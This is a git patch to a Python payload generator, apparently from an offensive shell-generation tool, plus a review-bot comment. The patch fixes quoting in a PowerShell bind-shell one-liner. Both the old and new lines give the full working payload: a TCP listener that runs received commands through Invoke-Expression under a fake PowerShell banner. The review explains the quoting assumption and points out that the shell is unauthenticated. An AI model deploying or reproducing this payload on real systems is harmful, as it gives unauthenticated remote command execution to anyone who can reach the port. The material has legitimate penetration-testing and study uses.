From c0b7f9724e7fef69b234b99e9692e7eb4bae0604 Mon Sep 17 00:00:00 2001
From: "Andre Marques (zc00l)"
Date: Sat, 11 Aug 2018 15:19:50 -0300
Subject: [PATCH] Fixing PowerShell bind shell Quote confusion ...
---
 src/bind.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/src/bind.py b/src/bind.py
index 377bc74..527dbfc 100644
--- a/src/bind.py
+++ b/src/bind.py
@@ -47,7 +47,7 @@ def BIND_NETCAT_TRADITIONAL_TCP():
 def BIND_POWERSHELL_TCP():
- return """powershell.exe -nop -ep bypass -Command '$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\"+$env:username+\\" on \\"+$env:computername+\\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes(\\"PS \\"+(Get-Location).Path+\\"> \\");$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning \\"Something went wrong with execution of command on the target.\\";Write-Error $_;};$VAR10=$VAR9+ \\"PS \\"+(Get-Location).Path+\\"> \\";$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};'"""
+ return """powershell.exe -nop -ep bypass -Command "$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. 
All rights reserved.`n`n');$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$VAR10=$VAR9+ 'PS '+(Get-Location).Path + '> ';$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};" """ # Removed from MetasploitFramework
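Review bot: The new double-quoted `-Command "..."` form is only correct when the one-liner is launched from cmd.exe or another non-PowerShell launcher (a service binary, WMI, psexec); pasted into a PowerShell host, the outer shell expands `$VAR1`..`$VAR11`, `$env:username` and the backtick escapes inside the double quotes before powershell.exe ever sees them, so the inner script runs with empty variables. That assumption should be recorded on the function, e.g. `# Quoted for cmd.exe: an outer PowerShell would interpolate $VAR* and backtick escapes inside the double quotes; prefer -EncodedCommand when launching from PowerShell.` The payload is also an unauthenticated bind shell: `[System.Net.Sockets.TcpListener]$VAR1` uses the port-only constructor, which as far as I recall listens on every interface, so anyone who can reach PORT gets `Invoke-Expression` as the running user, and a one-line warning in a docstring would help operators. The trailing `# Removed from MetasploitFramework` may be a separate context line rather than part of the returned string; the hunk's tail is not fully visible here.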